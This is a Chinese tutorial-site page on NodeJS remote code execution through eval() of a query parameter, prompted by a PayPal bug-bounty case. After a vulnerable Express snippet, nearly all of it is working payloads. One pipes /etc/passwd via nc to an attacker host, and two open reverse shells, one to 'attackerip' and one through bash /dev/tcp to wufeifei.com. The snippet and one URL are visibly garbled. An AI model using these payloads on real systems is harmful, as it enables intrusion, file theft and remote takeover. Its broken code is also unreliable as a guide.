首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
手机游戏
当前位置:查字典教程网 >编程开发 >Javascript教程 >NodeJS远程代码执行
NodeJS远程代码执行
摘要:背景@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。测试varexpress=requir...

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); var app = express(); app.get('/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); });

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/"child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

【NodeJS远程代码执行】相关文章:

详解Wondows下Node.js使用MongoDB的环境配置

JQuery中DOM加载与事件执行实例分析

JS代码混淆初步

javascript转换静态图片,增加粒子动画效果

剖析Node.js异步编程中的回调与代码设计模式

网页常用特效代码整理

javascript匹配车牌号正则表达式

自动关闭的层

JS代码的格式化和压缩

特殊字符、常规符号及其代码对照表

上一篇: ionic组件ion-tabs选项卡切换效果实例
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
编程开发子分类
最新Javascript教程学习
热门Javascript教程学习